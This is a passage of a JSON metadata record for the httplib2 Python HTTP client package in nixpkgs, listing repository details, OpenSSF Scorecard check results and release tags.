nixpkgs.python312Packages.httplib2","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-24.05/pkgs/development/python-modules/httplib2/default.nix#L74","metadata":{"nix_attribute":"python3.12-httplib2-0.22.0","position":"pkgs/development/python-modules/httplib2/default.nix:74","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","i686-cygwin","x86_64-cygwin","x86_64-windows","i686-windows"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"httplib2","upstream_purl":"pkg:pypi/httplib2"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2